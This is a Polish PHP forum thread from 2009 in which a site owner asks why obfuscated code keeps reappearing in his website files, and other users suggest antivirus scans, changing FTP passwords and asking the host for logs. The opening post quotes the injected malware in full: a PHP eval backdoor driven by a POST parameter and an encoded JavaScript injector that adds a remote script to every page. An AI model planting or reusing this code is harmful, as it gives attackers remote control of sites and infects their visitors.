 [PHP][JavaScript]Wirusy na stronach internetowych, JavaScript, PHP |
  |
| [PHP][JavaScript]Wirusy na stronach internetowych, JavaScript, PHP |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 1 335 Pomógł: 34 Dołączył: 9.11.2005 Skąd: Wrocław Ostrzeżenie: (10%) 
 |
Witam, od jakiegoś czasu cały czas psuje mi się strona i firewall wariuje, jak wchodzę na swoją stronę. Co jakiś czas wstrzykuje mi się wszędzie do plików kod na wzór tego:
Kod <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihVSUl6Qyl7dmFyIHFu HZTPSd2YDYxYDcyYDIwYWAzZGAyMlNgNjNyaWA3MHRFYDZlZ2luZWAyMmAyY2JgM2RgMjJWZXJzaW9uY I4KStgMjJgMmNgNmFgM2RgMjJgMjJgMmN1YDNkbmF2aWdgNjF0b3JgMmV1c2VgNzJgNDFgNjdlbmA3NG zYmA2OWA2NigodWAyZWluZGV4T2YoYDIyYDQzYDY4cmA2Zm1lYDIyKWAzYzApYDI2YDI2KHVgMmVpbmR eE9gNjYoYDIyYDU3aW5gMjIpYDNlYDMwKWAyNmAyNih1YDJlaW5gNjRlYDc4T2ZgMjhgMjJgNGVgNTRg jA2YDIyKWAzYzBgMjlgMjZgMjYoZGA2ZmA2M3VtYDY1bnRgMmVgNjNgNmZvYDZiaWVgMmVpbmRlYDc4T YoYDIybWlla2AzZDFgMjIpYDNjYDMwKWAyNmAyNmAyOHR5YDcwZW9gNjZgMjh6cmA3NmA3YXRzKWAyMW zZGA3NHlwZW9mKGAyMmA0MWAyMikpKWA3YmA3YXJ2enRzYDNkYDIyQWAyMmAzYmA2NXZhbChgMjJpYDY YDI4d2A2OW5kb3dgMmVgMjIrYStgMjIpamAzZGA2YStgMjJgMmJhYDJiYDIyYDRkYWpvcmAyMitiK2Er DIyTWlub3JgMjIrYDYyK2ErYDIyQnVpbGA2NGAyMitgNjIrYDIyamAzYmAyMilgM2Jkb2N1bWVuYDc0Y Jld2A3MmlgNzRlKGAyMmAzY3NjcmlwdGAyMHNyY2AzZGAyZmAyZm1hcnRgMjIrYDIydXpgMmVjbmAyZn pZGAyZmAzZmA2OWA2NGAzZGAyMitqK2AyMmAzZWAzY2A1Y2AyZnNjcmA2OXB0YDNlYDIyKWAzYmA3ZCc dmFyIENsOWE9dW5lc2NhcGUocW5kdlMucmVwbGFjZShVSUl6QywnJScpKTtldmFsKENsOWEpfSkoL1xg 2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> I co jakiś czas różne i podobne. Ostatnio usunąłem już wszystkie pliki z serwera, zmieniłem hasło, wgrałem na nowo plik tylko z logiem i tekstem (żadnych skryptów czy czegoś innego) i po dwóch dniach znowu ten kod się wpisał do pliku. Proszę o pomoc. Chciałbym dodać, że sprawa jest dla mnie pilna. |
 |
 
|
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 726 Pomógł: 129 Dołączył: 10.01.2008 Skąd: Gdańsk Ostrzeżenie: (0%) 
|
|
|
|
|
|
Post
#3
|
|
|
Grupa: Moderatorzy Postów: 8 989 Pomógł: 1550 Dołączył: 8.08.2008 Skąd: Słupsk/Gdańsk |
A przeskanowałeś kompa antyvirem?
Co to za serwer? |
|
|
|
|
Post
#4
|
|
|
Grupa: Zarejestrowani Postów: 1 335 Pomógł: 34 Dołączył: 9.11.2005 Skąd: Wrocław Ostrzeżenie: (10%)
|
Serwer jest w boo.pl
Kompa skanowałem ostatnio, bo miałem problemy z jakimiś trojanami, czy malwarami, ale już mam spoko. Zmieniłem teraz jeszcze raz hasło do konta i nie zapisałem go, by automatycznie się łączyło. Może będzie dobrze. |
|
|
|
|
Post
#5
|
|
|
Grupa: Moderatorzy Postów: 8 989 Pomógł: 1550 Dołączył: 8.08.2008 Skąd: Słupsk/Gdańsk |
Napisz potem do nich o logi zmian na plikach to wtedy moze dadza ci info kto to robi i jakim sposobem.
|
|
|
|
|
Post
#6
|
|
|
Grupa: Zarejestrowani Postów: 385 Pomógł: 26 Dołączył: 22.03.2008 Skąd: TM Ostrzeżenie: (0%)
|
Jest to zakodowany jakiś tekst. Jesteś chyba 2 osobą która ma problem z boo.pl jesli chodzi o wirusy, która napisała posta o tym przez ostatnie 2 tyg (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Przypadek?(IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)
|
|
|
|
|
Post
#7
|
|
|
Grupa: Zarejestrowani Postów: 1 335 Pomógł: 34 Dołączył: 9.11.2005 Skąd: Wrocław Ostrzeżenie: (10%)
|
Cytat(kajzur @ 16.05.2009, 13:52:54 )  Jest to zakodowany jakiś tekst. Jesteś chyba 2 osobą która ma problem z boo.pl jesli chodzi o wirusy, która napisała posta o tym przez ostatnie 2 tyg (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Przypadek?(IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) nie wiem? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Może ten hosting jest felerny jakiś... |
|
|
|
|
Post
#8
|
|
|
Grupa: Zarejestrowani Postów: 385 Pomógł: 26 Dołączył: 22.03.2008 Skąd: TM Ostrzeżenie: (0%)
|
Kiedyś miałem stronke na nim, ale na forum moderator nie był zbyt miły, następnie administrator również nie koniecznie, to się przeniosłem do cal.pl i jest ładnie (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)
|
|
|
|
|
Post
#9
|
|
|
Grupa: Zarejestrowani Postów: 420 Pomógł: 44 Dołączył: 22.10.2008 Ostrzeżenie: (0%)
|
Cytat(in5ane @ 16.05.2009, 16:03:39 ) nie wiem? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Może ten hosting jest felerny jakiś... Raczej nie feralny hosting bo mam na nim dwie strony i żadnych problemów nie miałem z wirusami jak by serwer był słabo zabezpieczony to podejrzewam że wszystkie konta zostały by zainfekowane kiedyś znajomy miał podobny problem i okazało się że wirus pobrał dane z jego ftp (total comander) i zaraził wszystkie konta do kturych miał dostęp na różnych serwerach, także raczej nie hosting tylko komp właściciela konta |
|
|
|
|
Post
#10
|
|
|
Grupa: Zarejestrowani Postów: 231 Pomógł: 17 Dołączył: 26.08.2007 Ostrzeżenie: (10%)
|
Zmień hasło do FTP a następnie usuń ten kod z pliku i problem masz z głowy.
Jeszcze nie zapamiętuj haseł w klientach FTP... Ten post edytował Puzi 17.05.2009, 08:41:47 |
|
|
|
|
Post
#11
|
|
|
Grupa: Zarejestrowani Postów: 48 Pomógł: 9 Dołączył: 7.03.2009 Skąd: Łódź Ostrzeżenie: (0%)
|
Cytat(kajzur @ 16.05.2009, 19:32:12 ) Kiedyś miałem stronke na nim, ale na forum moderator nie był zbyt miły, następnie administrator również nie koniecznie, to się przeniosłem do cal.pl i jest ładnie (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Też podobnie zrobiłem, choć nie hostowałem na boo.pl Przeniosłem się do cal.pl i powiem, że takiej wzorowej pomocy admina jak tam nigdzie nie widziałem. |
|
|
|
|
|
Aktualny czas: 22.08.2025 - 12:01 |
